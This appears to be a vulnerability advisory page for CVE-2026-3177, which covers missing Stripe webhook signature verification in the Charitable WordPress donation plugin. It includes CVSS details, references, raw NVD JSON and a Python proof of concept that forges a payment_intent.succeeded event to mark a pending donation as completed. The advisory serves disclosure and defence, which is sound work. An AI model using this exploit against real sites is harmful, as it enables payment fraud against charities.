CVE-2026-3177

Description

The Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 1.8.9.7. This is due to missing cryptographic verification of incoming Stripe webhook events. This makes it possible for unauthenticated attackers to forge payment_intent.succeeded webhook payloads and mark pending donations as completed without a real payment.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Charitable – Donation Plugin for WordPress <= 1.8.9.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Target URL of the vulnerable WordPress plugin's webhook endpoint
target_url = "http://target-site.com/wp-json/charitable/v1/stripe/webhook"

# Malicious payload mimicking a successful Stripe payment event
# 'donation_id' corresponds to the ID in the WordPress database
payload = {
    "id": "evt_fake_webhook_id_12345",
    "type": "payment_intent.succeeded",
    "data": {
        "object": {
            "id": "pi_fake_payment_intent",
            "metadata": {
                "donation_id": "123"
            },
            "status": "succeeded",
            "amount": 5000
        }
    }
}

headers = {
    "Content-Type": "application/json"
    # Note: The Stripe-Signature header is missing or not verified in the vulnerable version
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)
    if response.status_code == 200:
        print("[+] Webhook sent successfully. Donation potentially marked as completed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3177
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3177
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3177/
[4] VulDB https://vuldb.com/cve/CVE-2026-3177
[5] https://plugins.trac.wordpress.org/changeset/3485023/charitable
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3177", "sourceIdentifier": "[email protected]", "published": "2026-04-07T08:16:11.090", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 1.8.9.7. This is due to missing cryptographic verification of incoming Stripe webhook events. This makes it possible for unauthenticated attackers to forge payment_intent.succeeded webhook payloads and mark pending donations as completed without a real payment."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-345"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3485023/charitable", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve", "source": "[email protected]"}]}}